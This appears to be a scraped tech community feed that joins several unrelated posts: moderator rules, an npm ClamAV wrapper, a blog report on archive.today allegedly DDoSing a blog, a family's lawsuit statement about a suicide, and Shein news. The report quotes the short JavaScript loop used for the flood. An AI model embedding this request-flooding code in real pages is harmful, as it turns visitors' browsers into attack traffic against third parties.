Hey everyone. Just wanted to do a post to pin in the community just to enforce the difference between c/tech and c/technology more since there's been more and more rule breaking posts popping up and I don't want to put more work on maintaining here since there's no dedicated mod team for it atm

This is a community oriented towards underlying tech so for new things happening in the tech world as opposed to misc legislation and company news

Examples of posts that fit here

  • Wi-Fi 8 will bring reliability rather than greater speed
  • App that translates speech to sign language in real-time wins top innovation prize
  • FDA approves breakthrough eye drops that fix near vision without glasses
  • We hacked into a bowling alley computer | The Serial Port
  • Scientists Make First Mechanical Qubit
  • New version of the PNG image standard released

Examples of posts that do not (and should go into c/technology instead)

  • Atlassian moved 4 million Postgres databases to AWS Aurora
  • Verizon Announces CEO Transition
  • Tailwind Labs Cuts 75% Engineers: AI Kills CSS Tools
  • Architecting Consent for AI: Deceptive Patterns in Firefox Link Preview

Since it wasn't being enforced as much some older rule breaking posts are still up but things should be getting enforced more from now on (if something sneaks through and gets large with no presence in the other communities I can leave it up but ideally it would go into c/technology instead)

If someone wants to mod this community feel free to let me know since it doesn't have a mod team atm

A minimal Node.js wrapper around ClamAV that scans any file and returns a typed Verdict Symbol:

  • Verdict.Clean
  • Verdict.Malicious
  • Verdict.ScanError

Zero runtime dependencies. No daemon. No cloud. No native bindings. Works locally via clamscan or remotely via clamd TCP socket (Docker-friendly).

npm install pompelmi

note to mods: this is an opinion article, but it contains a lot of newsworthy statistics and prose on Maven (Java ecosystem package repository) being used as a CDN

Around January 11, 2026, archive.today (aka archive.is, archive.md, etc) started using its users as proxies to conduct a distributed denial of service (DDOS) attack against Gyrovague, my personal blog. All users encountering archive.today’s CAPTCHA page currently load and execute the following Javascript

        setInterval(function() {
            fetch("https://gyrovague.com/?s" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
                referrerPolicy: "no-referrer",
                mode: "no-cors"
            });
        }, 300);

Greg Surman post, with the following text:

Our beloved, irreplaceable daughter Annie should’ve been celebrating her 30th birthday this week. Instead, we’re left marking that milestone without her -- remembering all that she was and grieving all that should have been.

Annie died by suicide last year, after being fired by MongoDB while she was on disability leave.

Yesterday, we filed a legal complaint against MongoDB, seeking accountability for Annie’s wrongful termination and wrongful death. The complaint alleges as follows:

Annie was on leave receiving intensive mental health treatment when MongoDB demanded her immediate return to work. She asked for an extension to complete her treatment, or at the least a short period to consult with her medical providers about whether and how she might be able to return to work before the treatment was completed. Instead, MongoDB terminated her health insurance and then fired her in violation of the Americans with Disabilities Act and the New York State and City Human Rights Laws. Shortly afterward, Annie took her own life.

An extension of Annie’s leave would have cost MongoDB nothing. We made it clear that they did not need to pay her or hold her job open for her. We just asked them not to fire her while she was in such a vulnerable state, as we feared that would result in tragedy. We just wanted a little more time to get her stabilized.

We understand MongoDB may have told some of Annie’s colleagues that she quit. That is not true. MongoDB fired her.

We’re pursuing this case to set the record straight and to help ensure that powerful companies like MongoDB do not continue to violate the rights of their employees

  • Shein’s popularity has grown exponentially in Argentina recently, following sweeping deregulation efforts by the government.
  • The influx of ultrafast fashion has put a damper on the local textile industry.
  • Lawmakers across Latin America are pushing for “anti-Shein” bills, joining global efforts to rein in ultrafast fashion.
